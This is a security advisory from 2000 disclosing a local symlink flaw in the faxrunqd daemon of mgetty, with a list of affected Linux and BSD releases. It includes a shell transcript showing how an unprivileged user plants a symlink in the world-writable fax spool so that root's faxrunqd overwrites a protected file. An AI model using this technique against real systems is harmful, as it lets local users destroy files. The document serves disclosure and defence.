|
Home : Advisories : mgetty local compromise
Title: |
mgetty local compromise |
Released by: |
Stan Bubrouski |
Date: |
26th August 2000 |
Printable version: |
Click here |
Author : Stan Bubrouski
Date : August 26, 2000
Package : mgetty
Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)
Severity : faxrunqd follows symbolic links when creating
certain files. The default location
for the files is /var/spool/fax/outgoing,
which is a world-writable directory. Local
users can destroy the contents of any file on
a mounted filesystem because faxrunqd is
usually run by root.
Problem : mgetty comes with a program named faxrunqd, which is
a daemon to send fax jobs queued
by faxspool(1). Upon successful execution, a
file named .last_run is created in the
/var/spool/fax/outgoing/ directory which is
world-writable. The problem lies in the
fact faxrunqd will follow symlinks created by
any user, allowing file creation anywhere
and allowing existing files to be
overwritten/destroyed.
Example:
Remote unprivilaged user:
[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:46 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
Root console:
[root@king /tmp]# faxrunqd -l ttyS0
...
Remote unprivilaged user:
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd
[user@king /tmp]$
Believed to be vulnerable:
Red Hat Linux 6.2 and all prior versions (Vulnerable)
Linux-Mandrake 7.1 and all prior versions (Vulnerable)
Conectiva Linux 4.2, 5.0, and 5.1 (Untested)
LinuxPPC 1999 and 2000 (Untested)
TurboLinux 4.0, 6.0 (Untested)
Debian 2.2 (potato), 2.1 (slink) (Untested)
Yellow Dog Linux Champion Server 1.0, 1.1, 1.2 (Untested)
MkLinux Pre Release 1 (R1) (Untested)
Caldera OpenLinux 2.2, 2.3, 2.4 (Untested)
Think Blue Linux 1.0 (Linux for the S/390) (Untested)
OpenBSD 2.7? (mgetty is included in ports packages)
NetBSD 1.4.2?
FreeBSD?
Probably others...
Believed to be unaffected:
SuSE - all versions
Slackware - all versions
|